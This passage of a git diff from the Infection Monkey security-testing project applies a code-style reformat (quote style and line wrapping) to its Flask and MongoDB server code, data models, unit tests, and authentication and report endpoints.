monkey_island.cc.resources.auth.auth_user import User class UserCreds: - def __init__(self, username="", password_hash=""): self.username = username self.password_hash = password_hash @@ -18,9 +17,9 @@ class UserCreds: def to_dict(self) -> Dict: cred_dict = {} if self.username: - cred_dict.update({'user': self.username}) + cred_dict.update({"user": self.username}) if self.password_hash: - cred_dict.update({'password_hash': self.password_hash}) + cred_dict.update({"password_hash": self.password_hash}) return cred_dict def to_auth_user(self) -> User: @@ -29,10 +28,10 @@ class UserCreds: @staticmethod def get_from_dict(data_dict: Dict) -> UserCreds: creds = UserCreds() - if 'user' in data_dict: - creds.username = data_dict['user'] - if 'password_hash' in data_dict: - creds.password_hash = data_dict['password_hash'] + if "user" in data_dict: + creds.username = data_dict["user"] + if "password_hash" in data_dict: + creds.password_hash = data_dict["password_hash"] return creds @staticmethod diff --git a/monkey/monkey_island/cc/main.py b/monkey/monkey_island/cc/main.py index 211084565..bc7b8e283 100644 --- a/monkey/monkey_island/cc/main.py +++ b/monkey/monkey_island/cc/main.py @@ -37,8 +37,10 @@ def main(should_setup_only=False, server_config_filename=DEFAULT_SERVER_CONFIG_P env_singleton.initialize_from_file(server_config_filename) initialize_encryptor(env_singleton.env.get_config().data_dir_abs_path) - mongo_url = os.environ.get('MONGO_URL', env_singleton.env.get_mongo_url()) - bootloader_server_thread = Thread(target=BootloaderHttpServer(mongo_url).serve_forever, daemon=True) + mongo_url = os.environ.get("MONGO_URL", env_singleton.env.get_mongo_url()) + bootloader_server_thread = Thread( + target=BootloaderHttpServer(mongo_url).serve_forever, daemon=True + ) bootloader_server_thread.start() start_island_server(should_setup_only) @@ -47,15 +49,15 @@ def main(should_setup_only=False, server_config_filename=DEFAULT_SERVER_CONFIG_P def start_island_server(should_setup_only): - mongo_url = os.environ.get('MONGO_URL', env_singleton.env.get_mongo_url()) + mongo_url = os.environ.get("MONGO_URL", env_singleton.env.get_mongo_url()) wait_for_mongo_db_server(mongo_url) assert_mongo_db_version(mongo_url) populate_exporter_list() app = init_app(mongo_url) - crt_path = str(Path(MONKEY_ISLAND_ABS_PATH, 'cc', 'server.crt')) - key_path = str(Path(MONKEY_ISLAND_ABS_PATH, 'cc', 'server.key')) + crt_path = str(Path(MONKEY_ISLAND_ABS_PATH, "cc", "server.crt")) + key_path = str(Path(MONKEY_ISLAND_ABS_PATH, "cc", "server.key")) setup() @@ -64,20 +66,29 @@ def start_island_server(should_setup_only): return if env_singleton.env.is_debug(): - app.run(host='0.0.0.0', debug=True, ssl_context=(crt_path, key_path)) + app.run(host="0.0.0.0", debug=True, ssl_context=(crt_path, key_path)) else: - http_server = WSGIServer(('0.0.0.0', env_singleton.env.get_island_port()), app, - certfile=os.environ.get('SERVER_CRT', crt_path), - keyfile=os.environ.get('SERVER_KEY', key_path)) + http_server = WSGIServer( + ("0.0.0.0", env_singleton.env.get_island_port()), + app, + certfile=os.environ.get("SERVER_CRT", crt_path), + keyfile=os.environ.get("SERVER_KEY", key_path), + ) log_init_info() http_server.serve_forever() def log_init_info(): - logger.info('Monkey Island Server is running!') + logger.info("Monkey Island Server is running!") logger.info(f"version: {get_version()}") - logger.info('Listening on the following URLs: {}'.format( - ", ".join(["https://{}:{}".format(x, env_singleton.env.get_island_port()) for x in local_ip_addresses()]) + logger.info( + "Listening on the following URLs: {}".format( + ", ".join( + [ + "https://{}:{}".format(x, env_singleton.env.get_island_port()) + for x in local_ip_addresses() + ] + ) ) ) MonkeyDownload.log_executable_hashes() @@ -85,7 +96,7 @@ def log_init_info(): def wait_for_mongo_db_server(mongo_url): while not is_db_server_up(mongo_url): - logger.info('Waiting for MongoDB server on {0}'.format(mongo_url)) + logger.info("Waiting for MongoDB server on {0}".format(mongo_url)) time.sleep(1) @@ -99,11 +110,14 @@ def assert_mongo_db_version(mongo_url): server_version = get_db_version(mongo_url) if server_version < required_version: logger.error( - 'Mongo DB version too old. {0} is required, but got {1}'.format(str(required_version), str(server_version))) + "Mongo DB version too old. {0} is required, but got {1}".format( + str(required_version), str(server_version) + ) + ) sys.exit(-1) else: - logger.info('Mongo DB version OK. Got {0}'.format(str(server_version))) + logger.info("Mongo DB version OK. Got {0}".format(str(server_version))) -if __name__ == '__main__': +if __name__ == "__main__": main() diff --git a/monkey/monkey_island/cc/models/__init__.py b/monkey/monkey_island/cc/models/__init__.py index 87626c448..c668be7ae 100644 --- a/monkey/monkey_island/cc/models/__init__.py +++ b/monkey/monkey_island/cc/models/__init__.py @@ -3,6 +3,7 @@ from mongoengine import connect import monkey_island.cc.environment.environment_singleton as env_singleton from .command_control_channel import CommandControlChannel # noqa: F401 + # Order of importing matters here, for registering the embedded and referenced documents before using them. from .config import Config # noqa: F401 from .creds import Creds # noqa: F401 @@ -10,6 +11,8 @@ from .monkey import Monkey # noqa: F401 from .monkey_ttl import MonkeyTtl # noqa: F401 from .pba_results import PbaResults # noqa: F401 -connect(db=env_singleton.env.mongo_db_name, - host=env_singleton.env.mongo_db_host, - port=env_singleton.env.mongo_db_port) +connect( + db=env_singleton.env.mongo_db_name, + host=env_singleton.env.mongo_db_host, + port=env_singleton.env.mongo_db_port, +) diff --git a/monkey/monkey_island/cc/models/attack/attack_mitigations.py b/monkey/monkey_island/cc/models/attack/attack_mitigations.py index 0c38ecbeb..3df6b839d 100644 --- a/monkey/monkey_island/cc/models/attack/attack_mitigations.py +++ b/monkey/monkey_island/cc/models/attack/attack_mitigations.py @@ -12,7 +12,7 @@ class AttackMitigations(Document): COLLECTION_NAME = "attack_mitigations" technique_id = StringField(required=True, primary_key=True) - mitigations = ListField(EmbeddedDocumentField('Mitigation')) + mitigations = ListField(EmbeddedDocumentField("Mitigation")) @staticmethod def get_mitigation_by_technique_id(technique_id: str) -> Document: @@ -23,23 +23,29 @@ class AttackMitigations(Document): def add_mitigation(self, mitigation: CourseOfAction): mitigation_external_ref_id = MitreApiInterface.get_stix2_external_reference_id(mitigation) - if mitigation_external_ref_id.startswith('M'): + if mitigation_external_ref_id.startswith("M"): self.mitigations.append(Mitigation.get_from_stix2_data(mitigation)) def add_no_mitigations_info(self, mitigation: CourseOfAction): mitigation_external_ref_id = MitreApiInterface.get_stix2_external_reference_id(mitigation) - if mitigation_external_ref_id.startswith('T') and len(self.mitigations) == 0: + if mitigation_external_ref_id.startswith("T") and len(self.mitigations) == 0: mitigation_mongo_object = Mitigation.get_from_stix2_data(mitigation) - mitigation_mongo_object['description'] = mitigation_mongo_object['description'].splitlines()[0] - mitigation_mongo_object['url'] = '' + mitigation_mongo_object["description"] = mitigation_mongo_object[ + "description" + ].splitlines()[0] + mitigation_mongo_object["url"] = "" self.mitigations.append(mitigation_mongo_object) @staticmethod def mitigations_from_attack_pattern(attack_pattern: AttackPattern): - return AttackMitigations(technique_id=MitreApiInterface.get_stix2_external_reference_id(attack_pattern), - mitigations=[]) + return AttackMitigations( + technique_id=MitreApiInterface.get_stix2_external_reference_id(attack_pattern), + mitigations=[], + ) @staticmethod def dict_from_stix2_attack_patterns(stix2_dict: Dict[str, AttackPattern]): - return {key: AttackMitigations.mitigations_from_attack_pattern(attack_pattern) - for key, attack_pattern in stix2_dict.items()} + return { + key: AttackMitigations.mitigations_from_attack_pattern(attack_pattern) + for key, attack_pattern in stix2_dict.items() + } diff --git a/monkey/monkey_island/cc/models/attack/mitigation.py b/monkey/monkey_island/cc/models/attack/mitigation.py index 03c8bafef..3c096b618 100644 --- a/monkey/monkey_island/cc/models/attack/mitigation.py +++ b/monkey/monkey_island/cc/models/attack/mitigation.py @@ -12,7 +12,7 @@ class Mitigation(EmbeddedDocument): @staticmethod def get_from_stix2_data(mitigation: CourseOfAction): - name = mitigation['name'] - description = mitigation['description'] + name = mitigation["name"] + description = mitigation["description"] url = MitreApiInterface.get_stix2_external_reference_url(mitigation) return Mitigation(name=name, description=description, url=url) diff --git a/monkey/monkey_island/cc/models/command_control_channel.py b/monkey/monkey_island/cc/models/command_control_channel.py index 3aefef455..a055c4a66 100644 --- a/monkey/monkey_island/cc/models/command_control_channel.py +++ b/monkey/monkey_island/cc/models/command_control_channel.py @@ -7,5 +7,6 @@ class CommandControlChannel(EmbeddedDocument): src - Monkey Island's IP dst - Monkey's IP (in case of a proxy chain this is the IP of the last monkey) """ + src = StringField() dst = StringField() diff --git a/monkey/monkey_island/cc/models/config.py b/monkey/monkey_island/cc/models/config.py index cfe128111..f4af7b400 100644 --- a/monkey/monkey_island/cc/models/config.py +++ b/monkey/monkey_island/cc/models/config.py @@ -7,5 +7,6 @@ class Config(EmbeddedDocument): monkey_island.cc.services.config_schema. See https://mongoengine-odm.readthedocs.io/apireference.html#mongoengine.FieldDoesNotExist """ - meta = {'strict': False} + + meta = {"strict": False} pass diff --git a/monkey/monkey_island/cc/models/creds.py b/monkey/monkey_island/cc/models/creds.py index 61322362e..d0861846d 100644 --- a/monkey/monkey_island/cc/models/creds.py +++ b/monkey/monkey_island/cc/models/creds.py @@ -5,5 +5,6 @@ class Creds(EmbeddedDocument): """ TODO get an example of this data, and make it strict """ - meta = {'strict': False} + + meta = {"strict": False} pass diff --git a/monkey/monkey_island/cc/models/edge.py b/monkey/monkey_island/cc/models/edge.py index 78fb91d6e..bb4f8a2c6 100644 --- a/monkey/monkey_island/cc/models/edge.py +++ b/monkey/monkey_island/cc/models/edge.py @@ -3,7 +3,7 @@ from mongoengine import BooleanField, Document, DynamicField, ListField, ObjectI class Edge(Document): - meta = {'allow_inheritance': True} + meta = {"allow_inheritance": True} # SCHEMA src_node_id = ObjectIdField(required=True) diff --git a/monkey/monkey_island/cc/models/monkey.py b/monkey/monkey_island/cc/models/monkey.py index b0009a335..c375a3858 100644 --- a/monkey/monkey_island/cc/models/monkey.py +++ b/monkey/monkey_island/cc/models/monkey.py @@ -2,8 +2,17 @@ Define a Document Schema for the Monkey document. """ import ring -from mongoengine import (BooleanField, DateTimeField, Document, DoesNotExist, DynamicField, EmbeddedDocumentField, - ListField, ReferenceField, StringField) +from mongoengine import ( + BooleanField, + DateTimeField, + Document, + DoesNotExist, + DynamicField, + EmbeddedDocumentField, + ListField, + ReferenceField, + StringField, +) from common.cloud import environment_names from monkey_island.cc.server_utils.consts import DEFAULT_MONKEY_TTL_EXPIRY_DURATION_IN_SECONDS @@ -21,10 +30,11 @@ class Monkey(Document): * The logic section defines complex questions we can ask about a single document which are asked multiple times, somewhat like an API. """ + # SCHEMA guid = StringField(required=True) - config = EmbeddedDocumentField('Config') - creds = ListField(EmbeddedDocumentField('Creds')) + config = EmbeddedDocumentField("Config") + creds = ListField(EmbeddedDocumentField("Creds")) dead = BooleanField() description = StringField() hostname = StringField() @@ -45,9 +55,13 @@ class Monkey(Document): command_control_channel = EmbeddedDocumentField(CommandControlChannel) # Environment related fields - environment = StringField(default=environment_names.Environment.UNKNOWN.value, - choices=environment_names.ALL_ENVIRONMENTS_NAMES) - aws_instance_id = StringField(required=False) # This field only exists when the monkey is running on an AWS + environment = StringField( + default=environment_names.Environment.UNKNOWN.value, + choices=environment_names.ALL_ENVIRONMENTS_NAMES, + ) + aws_instance_id = StringField( + required=False + ) # This field only exists when the monkey is running on an AWS # instance. See https://github.com/guardicore/monkey/issues/426. @@ -61,7 +75,7 @@ class Monkey(Document): @staticmethod # See https://www.python.org/dev/peps/pep-0484/#forward-references - def get_single_monkey_by_guid(monkey_guid) -> 'Monkey': + def get_single_monkey_by_guid(monkey_guid) -> "Monkey": try: return Monkey.objects.get(guid=monkey_guid) except DoesNotExist as ex: @@ -70,7 +84,7 @@ class Monkey(Document): @staticmethod def get_latest_modifytime(): if Monkey.objects.count() > 0: - return Monkey.objects.order_by('-modifytime').first().modifytime + return Monkey.objects.order_by("-modifytime").first().modifytime return None def is_dead(self): @@ -129,7 +143,7 @@ class Monkey(Document): Formats network info from monkey's model :return: dictionary with an array of IP's and a hostname """ - return {'ips': self.ip_addresses, 'hostname': self.hostname} + return {"ips": self.ip_addresses, "hostname": self.hostname} @ring.lru( expire=1 # data has TTL of 1 second. This is useful for rapid calls for report generation. diff --git a/monkey/monkey_island/cc/models/monkey_ttl.py b/monkey/monkey_island/cc/models/monkey_ttl.py index 3e456f244..e3025c250 100644 --- a/monkey/monkey_island/cc/models/monkey_ttl.py +++ b/monkey/monkey_island/cc/models/monkey_ttl.py @@ -27,15 +27,7 @@ class MonkeyTtl(Document): # https://stackoverflow.com/questions/55994379/mongodb-ttl-index-doesnt-delete-expired-documents. return MonkeyTtl(expire_at=datetime.utcnow() + timedelta(seconds=expiry_in_seconds)) - meta = { - 'indexes': [ - { - 'name': 'TTL_index', - 'fields': ['expire_at'], - 'expireAfterSeconds': 0 - } - ] - } + meta = {"indexes": [{"name": "TTL_index", "fields": ["expire_at"], "expireAfterSeconds": 0}]} expire_at = DateTimeField() diff --git a/monkey/monkey_island/cc/models/test_monkey.py b/monkey/monkey_island/cc/models/test_monkey.py index 7860de20e..404078c27 100644 --- a/monkey/monkey_island/cc/models/test_monkey.py +++ b/monkey/monkey_island/cc/models/test_monkey.py @@ -13,16 +13,12 @@ logger = logging.getLogger(__name__) class TestMonkey: - @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE) def test_is_dead(self): # Arrange alive_monkey_ttl = MonkeyTtl.create_ttl_expire_in(30) alive_monkey_ttl.save() - alive_monkey = Monkey( - guid=str(uuid.uuid4()), - dead=False, - ttl_ref=alive_monkey_ttl.id) + alive_monkey = Monkey(guid=str(uuid.uuid4()), dead=False, ttl_ref=alive_monkey_ttl.id) alive_monkey.save() # MIA stands for Missing In Action @@ -69,12 +65,12 @@ class TestMonkey: @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE) def test_get_os(self): - linux_monkey = Monkey(guid=str(uuid.uuid4()), - description="Linux shay-Virtual-Machine 4.15.0-50-generic #54-Ubuntu") - windows_monkey = Monkey(guid=str(uuid.uuid4()), - description="Windows bla bla bla") - unknown_monkey = Monkey(guid=str(uuid.uuid4()), - description="bla bla bla") + linux_monkey = Monkey( + guid=str(uuid.uuid4()), + description="Linux shay-Virtual-Machine 4.15.0-50-generic #54-Ubuntu", + ) + windows_monkey = Monkey(guid=str(uuid.uuid4()), description="Windows bla bla bla") + unknown_monkey = Monkey(guid=str(uuid.uuid4()), description="bla bla bla") linux_monkey.save() windows_monkey.save() unknown_monkey.save() @@ -85,32 +81,35 @@ class TestMonkey: @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE) def test_get_tunneled_monkeys(self): - linux_monkey = Monkey(guid=str(uuid.uuid4()), - description="Linux shay-Virtual-Machine") - windows_monkey = Monkey(guid=str(uuid.uuid4()), - description="Windows bla bla bla", - tunnel=linux_monkey) - unknown_monkey = Monkey(guid=str(uuid.uuid4()), - description="bla bla bla", - tunnel=windows_monkey) + linux_monkey = Monkey(guid=str(uuid.uuid4()), description="Linux shay-Virtual-Machine") + windows_monkey = Monkey( + guid=str(uuid.uuid4()), description="Windows bla bla bla", tunnel=linux_monkey + ) + unknown_monkey = Monkey( + guid=str(uuid.uuid4()), description="bla bla bla", tunnel=windows_monkey + ) linux_monkey.save() windows_monkey.save() unknown_monkey.save() tunneled_monkeys = Monkey.get_tunneled_monkeys() - test = bool(windows_monkey in tunneled_monkeys - and unknown_monkey in tunneled_monkeys - and linux_monkey not in tunneled_monkeys - and len(tunneled_monkeys) == 2) + test = bool( + windows_monkey in tunneled_monkeys + and unknown_monkey in tunneled_monkeys + and linux_monkey not in tunneled_monkeys + and len(tunneled_monkeys) == 2 + ) assert test @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE) def test_get_label_by_id(self): hostname_example = "a_hostname" ip_example = "1.1.1.1" - linux_monkey = Monkey(guid=str(uuid.uuid4()), - description="Linux shay-Virtual-Machine", - hostname=hostname_example, - ip_addresses=[ip_example]) + linux_monkey = Monkey( + guid=str(uuid.uuid4()), + description="Linux shay-Virtual-Machine", + hostname=hostname_example, + ip_addresses=[ip_example], + ) linux_monkey.save() logger.debug(id(Monkey.get_label_by_id)) diff --git a/monkey/monkey_island/cc/models/zero_trust/event.py b/monkey/monkey_island/cc/models/zero_trust/event.py index d1a0001af..727ec9a2a 100644 --- a/monkey/monkey_island/cc/models/zero_trust/event.py +++ b/monkey/monkey_island/cc/models/zero_trust/event.py @@ -15,6 +15,7 @@ class Event(EmbeddedDocument): * The logic section defines complex questions we can ask about a single document which are asked multiple times, or complex action we will perform - somewhat like an API. """ + # SCHEMA timestamp = DateTimeField(required=True) title = StringField(required=True) @@ -26,12 +27,7 @@ class Event(EmbeddedDocument): def create_event(title, message, event_type, timestamp=None): if not timestamp: timestamp = datetime.now() - event = Event( - timestamp=timestamp, - title=title, - message=message, - event_type=event_type - ) + event = Event(timestamp=timestamp, title=title, message=message, event_type=event_type) event.validate(clean=True) diff --git a/monkey/monkey_island/cc/models/zero_trust/finding.py b/monkey/monkey_island/cc/models/zero_trust/finding.py index f65d39af7..7ddf643fe 100644 --- a/monkey/monkey_island/cc/models/zero_trust/finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/finding.py @@ -28,8 +28,9 @@ class Finding(Document): * The logic section defines complex questions we can ask about a single document which are asked multiple times, or complex action we will perform - somewhat like an API. """ + # http://docs.mongoengine.org/guide/defining-documents.html#document-inheritance - meta = {'allow_inheritance': True} + meta = {"allow_inheritance": True} # SCHEMA test = StringField(required=True, choices=zero_trust_consts.TESTS) diff --git a/monkey/monkey_island/cc/models/zero_trust/monkey_finding.py b/monkey/monkey_island/cc/models/zero_trust/monkey_finding.py index 479b9b244..9fd1805f4 100644 --- a/monkey/monkey_island/cc/models/zero_trust/monkey_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/monkey_finding.py @@ -12,9 +12,7 @@ class MonkeyFinding(Finding): details = LazyReferenceField(MonkeyFindingDetails, required=True) @staticmethod - def save_finding(test: str, - status: str, - detail_ref: MonkeyFindingDetails) -> MonkeyFinding: + def save_finding(test: str, status: str, detail_ref: MonkeyFindingDetails) -> MonkeyFinding: finding = MonkeyFinding(test=test, status=status, details=detail_ref) finding.save() return finding diff --git a/monkey/monkey_island/cc/models/zero_trust/scoutsuite_finding.py b/monkey/monkey_island/cc/models/zero_trust/scoutsuite_finding.py index 9e36e46c5..174a68db7 100644 --- a/monkey/monkey_island/cc/models/zero_trust/scoutsuite_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/scoutsuite_finding.py @@ -12,9 +12,9 @@ class ScoutSuiteFinding(Finding): details = LazyReferenceField(ScoutSuiteFindingDetails, required=True) @staticmethod - def save_finding(test: str, - status: str, - detail_ref: ScoutSuiteFindingDetails) -> ScoutSuiteFinding: + def save_finding( + test: str, status: str, detail_ref: ScoutSuiteFindingDetails + ) -> ScoutSuiteFinding: finding = ScoutSuiteFinding(test=test, status=status, details=detail_ref) finding.save() return finding diff --git a/monkey/monkey_island/cc/models/zero_trust/test_event.py b/monkey/monkey_island/cc/models/zero_trust/test_event.py index f4044c037..653be95ec 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_event.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_event.py @@ -11,19 +11,15 @@ class TestEvent: _ = Event.create_event( title=None, # title required message="bla bla", - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, ) with pytest.raises(ValidationError): _ = Event.create_event( - title="skjs", - message="bla bla", - event_type="Unknown" # Unknown event type + title="skjs", message="bla bla", event_type="Unknown" # Unknown event type ) # Assert that nothing is raised. _ = Event.create_event( - title="skjs", - message="bla bla", - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK + title="skjs", message="bla bla", event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK ) diff --git a/monkey/monkey_island/cc/models/zero_trust/test_monkey_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_monkey_finding.py index 56a4066e1..f7cf39d22 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_monkey_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_monkey_finding.py @@ -9,30 +9,36 @@ from monkey_island.cc.models.zero_trust.monkey_finding_details import MonkeyFind from monkey_island.cc.test_common.fixtures import FixtureEnum MONKEY_FINDING_DETAIL_MOCK = MonkeyFindingDetails() -MONKEY_FINDING_DETAIL_MOCK.events = ['mock1', 'mock2'] +MONKEY_FINDING_DETAIL_MOCK.events = ["mock1", "mock2"] class TestMonkeyFinding: - @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE) def test_save_finding_validation(self): with pytest.raises(ValidationError): - _ = MonkeyFinding.save_finding(test="bla bla", - status=zero_trust_consts.STATUS_FAILED, - detail_ref=MONKEY_FINDING_DETAIL_MOCK) + _ = MonkeyFinding.save_finding( + test="bla bla", + status=zero_trust_consts.STATUS_FAILED, + detail_ref=MONKEY_FINDING_DETAIL_MOCK, + ) @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE) def test_save_finding_sanity(self): assert len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)) == 0 event_example = Event.create_event( - title="Event Title", message="event message", event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) + title="Event Title", + message="event message", + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, + ) monkey_details_example = MonkeyFindingDetails() monkey_details_example.events.append(event_example) monkey_details_example.save() - MonkeyFinding.save_finding(test=zero_trust_consts.TEST_SEGMENTATION, - status=zero_trust_consts.STATUS_FAILED, - detail_ref=monkey_details_example) + MonkeyFinding.save_finding( + test=zero_trust_consts.TEST_SEGMENTATION, + status=zero_trust_consts.STATUS_FAILED, + detail_ref=monkey_details_example, + ) assert len(MonkeyFinding.objects(test=zero_trust_consts.TEST_SEGMENTATION)) == 1 assert len(MonkeyFinding.objects(status=zero_trust_consts.STATUS_FAILED)) == 1 diff --git a/monkey/monkey_island/cc/models/zero_trust/test_scoutsuite_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_scoutsuite_finding.py index 723b428ff..07809cd90 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_scoutsuite_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_scoutsuite_finding.py @@ -10,19 +10,20 @@ from monkey_island.cc.services.zero_trust.test_common.scoutsuite_finding_data im from monkey_island.cc.test_common.fixtures import FixtureEnum MONKEY_FINDING_DETAIL_MOCK = MonkeyFindingDetails() -MONKEY_FINDING_DETAIL_MOCK.events = ['mock1', 'mock2'] +MONKEY_FINDING_DETAIL_MOCK.events = ["mock1", "mock2"] SCOUTSUITE_FINDING_DETAIL_MOCK = ScoutSuiteFindingDetails() SCOUTSUITE_FINDING_DETAIL_MOCK.scoutsuite_rules = [] class TestScoutSuiteFinding: - @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE) def test_save_finding_validation(self): with pytest.raises(ValidationError): - _ = ScoutSuiteFinding.save_finding(test=zero_trust_consts.TEST_SEGMENTATION, - status="bla bla", - detail_ref=SCOUTSUITE_FINDING_DETAIL_MOCK) + _ = ScoutSuiteFinding.save_finding( + test=zero_trust_consts.TEST_SEGMENTATION, + status="bla bla", + detail_ref=SCOUTSUITE_FINDING_DETAIL_MOCK, + ) @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE) def test_save_finding_sanity(self): @@ -32,9 +33,11 @@ class TestScoutSuiteFinding: scoutsuite_details_example = ScoutSuiteFindingDetails() scoutsuite_details_example.scoutsuite_rules.append(rule_example) scoutsuite_details_example.save() - ScoutSuiteFinding.save_finding(test=zero_trust_consts.TEST_SEGMENTATION, - status=zero_trust_consts.STATUS_FAILED, - detail_ref=scoutsuite_details_example) + ScoutSuiteFinding.save_finding( + test=zero_trust_consts.TEST_SEGMENTATION, + status=zero_trust_consts.STATUS_FAILED, + detail_ref=scoutsuite_details_example, + ) assert len(ScoutSuiteFinding.objects(test=zero_trust_consts.TEST_SEGMENTATION)) == 1 assert len(ScoutSuiteFinding.objects(status=zero_trust_consts.STATUS_FAILED)) == 1 diff --git a/monkey/monkey_island/cc/resources/T1216_pba_file_download.py b/monkey/monkey_island/cc/resources/T1216_pba_file_download.py index ac52b77f8..0ac69df6d 100644 --- a/monkey/monkey_island/cc/resources/T1216_pba_file_download.py +++ b/monkey/monkey_island/cc/resources/T1216_pba_file_download.py @@ -12,6 +12,8 @@ class T1216PBAFileDownload(flask_restful.Resource): """ def get(self): - executable_file_name = 'T1216_random_executable.exe' - return send_from_directory(directory=os.path.join(MONKEY_ISLAND_ABS_PATH, 'cc', 'resources', 'pba'), - filename=executable_file_name) + executable_file_name = "T1216_random_executable.exe" + return send_from_directory( + directory=os.path.join(MONKEY_ISLAND_ABS_PATH, "cc", "resources", "pba"), + filename=executable_file_name, + ) diff --git a/monkey/monkey_island/cc/resources/__init__.py b/monkey/monkey_island/cc/resources/__init__.py index e593a854b..a37455d11 100644 --- a/monkey/monkey_island/cc/resources/__init__.py +++ b/monkey/monkey_island/cc/resources/__init__.py @@ -1 +1 @@ -__author__ = 'Barak' +__author__ = "Barak" diff --git a/monkey/monkey_island/cc/resources/attack/__init__.py b/monkey/monkey_island/cc/resources/attack/__init__.py index 98867ed4d..4dc53e2ca 100644 --- a/monkey/monkey_island/cc/resources/attack/__init__.py +++ b/monkey/monkey_island/cc/resources/attack/__init__.py @@ -1 +1 @@ -__author__ = 'VakarisZ' +__author__ = "VakarisZ" diff --git a/monkey/monkey_island/cc/resources/attack/attack_config.py b/monkey/monkey_island/cc/resources/attack/attack_config.py index 532b1fb4f..570882dbd 100644 --- a/monkey/monkey_island/cc/resources/attack/attack_config.py +++ b/monkey/monkey_island/cc/resources/attack/attack_config.py @@ -10,11 +10,16 @@ __author__ = "VakarisZ" class AttackConfiguration(flask_restful.Resource): @jwt_required def get(self): - return current_app.response_class(json.dumps({"configuration": AttackConfig.get_config()}, - indent=None, - separators=(",", ":"), - sort_keys=False) + "\n", - mimetype=current_app.config['JSONIFY_MIMETYPE']) + return current_app.response_class( + json.dumps( + {"configuration": AttackConfig.get_config()}, + indent=None, + separators=(",", ":"), + sort_keys=False, + ) + + "\n", + mimetype=current_app.config["JSONIFY_MIMETYPE"], + ) @jwt_required def post(self): @@ -23,10 +28,10 @@ class AttackConfiguration(flask_restful.Resource): :return: Technique types dict with techniques on reset and nothing on update """ config_json = json.loads(request.data) - if 'reset_attack_matrix' in config_json: + if "reset_attack_matrix" in config_json: AttackConfig.reset_config() return jsonify(configuration=AttackConfig.get_config()) else: - AttackConfig.update_config({'properties': json.loads(request.data)}) + AttackConfig.update_config({"properties": json.loads(request.data)}) AttackConfig.apply_to_monkey_config() return {} diff --git a/monkey/monkey_island/cc/resources/attack/attack_report.py b/monkey/monkey_island/cc/resources/attack/attack_report.py index 779c436c5..72860cab7 100644 --- a/monkey/monkey_island/cc/resources/attack/attack_report.py +++ b/monkey/monkey_island/cc/resources/attack/attack_report.py @@ -9,12 +9,14 @@ __author__ = "VakarisZ" class AttackReport(flask_restful.Resource): - @jwt_required def get(self): - response_content = {'techniques': AttackReportService.get_latest_report()['techniques'], 'schema': SCHEMA} - return current_app.response_class(json.dumps(response_content, - indent=None, - separators=(",", ":"), - sort_keys=False) + "\n", - mimetype=current_app.config['JSONIFY_MIMETYPE']) + response_content = { + "techniques": AttackReportService.get_latest_report()["techniques"], + "schema": SCHEMA, + } + return current_app.response_class( + json.dumps(response_content, indent=None, separators=(",", ":"), sort_keys=False) + + "\n", + mimetype=current_app.config["JSONIFY_MIMETYPE"], + ) diff --git a/monkey/monkey_island/cc/resources/auth/auth.py b/monkey/monkey_island/cc/resources/auth/auth.py index b188955d8..47d68fb1a 100644 --- a/monkey/monkey_island/cc/resources/auth/auth.py +++ b/monkey/monkey_island/cc/resources/auth/auth.py @@ -18,7 +18,9 @@ logger = logging.getLogger(__name__) def init_jwt(app): user_store.UserStore.set_users(env_singleton.env.get_auth_users()) _ = flask_jwt_extended.JWTManager(app) - logger.debug("Initialized JWT with secret key that started with " + app.config["JWT_SECRET_KEY"][:4]) + logger.debug( + "Initialized JWT with secret key that started with " + app.config["JWT_SECRET_KEY"][:4] + ) class Authenticate(flask_restful.Resource): @@ -26,10 +28,11 @@ class Authenticate(flask_restful.Resource): Resource for user authentication. The user provides the username and hashed password and we give them a JWT. See `AuthService.js` file for the frontend counterpart for this code. """ + @staticmethod def _authenticate(username, secret): user = user_store.UserStore.username_table.get(username, None) - if user and safe_str_cmp(user.secret.encode('utf-8'), secret.encode('utf-8')): + if user and safe_str_cmp(user.secret.encode("utf-8"), secret.encode("utf-8")): return user def post(self): @@ -47,8 +50,11 @@ class Authenticate(flask_restful.Resource): # If the user and password have been previously registered if self._authenticate(username, secret): access_token = flask_jwt_extended.create_access_token( - identity=user_store.UserStore.username_table[username].id) - logger.debug(f"Created access token for user {username} that begins with {access_token[:4]}") + identity=user_store.UserStore.username_table[username].id + ) + logger.debug( + f"Created access token for user {username} that begins with {access_token[:4]}" + ) return make_response({"access_token": access_token, "error": ""}, 200) else: return make_response({"error": "Invalid credentials"}, 401) diff --git a/monkey/monkey_island/cc/resources/auth/auth_user.py b/monkey/monkey_island/cc/resources/auth/auth_user.py index d75c751ea..2661e7bd0 100644 --- a/monkey/monkey_island/cc/resources/auth/auth_user.py +++ b/monkey/monkey_island/cc/resources/auth/auth_user.py @@ -1,4 +1,4 @@ -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" class User(object): diff --git a/monkey/monkey_island/cc/resources/auth/registration.py b/monkey/monkey_island/cc/resources/auth/registration.py index b27116aa9..e5ca99232 100644 --- a/monkey/monkey_island/cc/resources/auth/registration.py +++ b/monkey/monkey_island/cc/resources/auth/registration.py @@ -8,7 +8,7 @@ from monkey_island.cc.environment.user_creds import UserCreds class Registration(flask_restful.Resource): def get(self): - return {'needs_registration': 